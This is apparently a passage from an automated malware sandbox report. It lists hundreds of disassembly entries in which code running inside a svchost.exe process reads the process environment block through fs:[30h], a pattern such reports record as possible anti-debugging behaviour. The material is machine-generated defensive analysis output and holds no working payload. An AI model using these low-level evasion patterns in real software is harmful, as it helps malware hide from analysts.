                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE609 mov eax, dword ptr fs:[00000030h]1_2_038AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384260B mov eax, dword ptr fs:[00000030h]1_2_0384260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872619 mov eax, dword ptr fs:[00000030h]1_2_03872619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E627 mov eax, dword ptr fs:[00000030h]1_2_0384E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03866620 mov eax, dword ptr fs:[00000030h]1_2_03866620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868620 mov eax, dword ptr fs:[00000030h]1_2_03868620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383262C mov eax, dword ptr fs:[00000030h]1_2_0383262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384C640 mov eax, dword ptr fs:[00000030h]1_2_0384C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F866E mov eax, dword ptr fs:[00000030h]1_2_038F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A660 mov eax, dword ptr fs:[00000030h]1_2_0386A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03862674 mov eax, dword ptr fs:[00000030h]1_2_03862674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov eax, dword ptr fs:[00000030h]1_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832582 mov ecx, dword ptr fs:[00000030h]1_2_03832582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864588 mov eax, dword ptr fs:[00000030h]1_2_03864588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E59C mov eax, dword ptr fs:[00000030h]1_2_0386E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B05A7 mov eax, dword ptr fs:[00000030h]1_2_038B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038545B1 mov eax, dword ptr fs:[00000030h]1_2_038545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E5CF mov eax, dword ptr fs:[00000030h]1_2_0386E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038365D0 mov eax, dword ptr fs:[00000030h]1_2_038365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A5D0 mov eax, dword ptr fs:[00000030h]1_2_0386A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E5E7 mov eax, dword ptr fs:[00000030h]1_2_0385E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038325E0 mov eax, dword ptr fs:[00000030h]1_2_038325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C5ED mov eax, dword ptr fs:[00000030h]1_2_0386C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6500 mov eax, dword ptr fs:[00000030h]1_2_038C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904500 mov eax, dword ptr fs:[00000030h]1_2_03904500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840535 mov eax, dword ptr fs:[00000030h]1_2_03840535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385E53E mov eax, dword ptr fs:[00000030h]1_2_0385E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838550 mov eax, dword ptr fs:[00000030h]1_2_03838550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386656A mov eax, dword ptr fs:[00000030h]1_2_0386656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA49A mov eax, dword ptr fs:[00000030h]1_2_038EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038364AB mov eax, dword ptr fs:[00000030h]1_2_038364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038644B0 mov ecx, dword ptr fs:[00000030h]1_2_038644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BA4B0 mov eax, dword ptr fs:[00000030h]1_2_038BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038304E5 mov ecx, dword ptr fs:[00000030h]1_2_038304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868402 mov eax, dword ptr fs:[00000030h]1_2_03868402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382E420 mov eax, dword ptr fs:[00000030h]1_2_0382E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C427 mov eax, dword ptr fs:[00000030h]1_2_0382C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6420 mov eax, dword ptr fs:[00000030h]1_2_038B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E443 mov eax, dword ptr fs:[00000030h]1_2_0386E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA456 mov eax, dword ptr fs:[00000030h]1_2_038EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382645D mov eax, dword ptr fs:[00000030h]1_2_0382645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385245A mov eax, dword ptr fs:[00000030h]1_2_0385245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BC460 mov ecx, dword ptr fs:[00000030h]1_2_038BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385A470 mov eax, dword ptr fs:[00000030h]1_2_0385A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840BBE mov eax, dword ptr fs:[00000030h]1_2_03840BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4BB0 mov eax, dword ptr fs:[00000030h]1_2_038E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850BCB mov eax, dword ptr fs:[00000030h]1_2_03850BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830BCD mov eax, dword ptr fs:[00000030h]1_2_03830BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEBD0 mov eax, dword ptr fs:[00000030h]1_2_038DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838BF0 mov eax, dword ptr fs:[00000030h]1_2_03838BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EBFC mov eax, dword ptr fs:[00000030h]1_2_0385EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCBF0 mov eax, dword ptr fs:[00000030h]1_2_038BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904B00 mov eax, dword ptr fs:[00000030h]1_2_03904B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AEB1D mov eax, dword ptr fs:[00000030h]1_2_038AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385EB20 mov eax, dword ptr fs:[00000030h]1_2_0385EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F8B28 mov eax, dword ptr fs:[00000030h]1_2_038F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E4B4B mov eax, dword ptr fs:[00000030h]1_2_038E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03902B57 mov eax, dword ptr fs:[00000030h]1_2_03902B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6B40 mov eax, dword ptr fs:[00000030h]1_2_038C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FAB40 mov eax, dword ptr fs:[00000030h]1_2_038FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8B42 mov eax, dword ptr fs:[00000030h]1_2_038D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03828B50 mov eax, dword ptr fs:[00000030h]1_2_03828B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DEB50 mov eax, dword ptr fs:[00000030h]1_2_038DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382CB7E mov eax, dword ptr fs:[00000030h]1_2_0382CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383EA80 mov eax, dword ptr fs:[00000030h]1_2_0383EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904A80 mov eax, dword ptr fs:[00000030h]1_2_03904A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03868A90 mov edx, dword ptr fs:[00000030h]1_2_03868A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838AA0 mov eax, dword ptr fs:[00000030h]1_2_03838AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886AA4 mov eax, dword ptr fs:[00000030h]1_2_03886AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03886ACC mov eax, dword ptr fs:[00000030h]1_2_03886ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830AD0 mov eax, dword ptr fs:[00000030h]1_2_03830AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03864AD0 mov eax, dword ptr fs:[00000030h]1_2_03864AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386AAEE mov eax, dword ptr fs:[00000030h]1_2_0386AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BCA11 mov eax, dword ptr fs:[00000030h]1_2_038BCA11
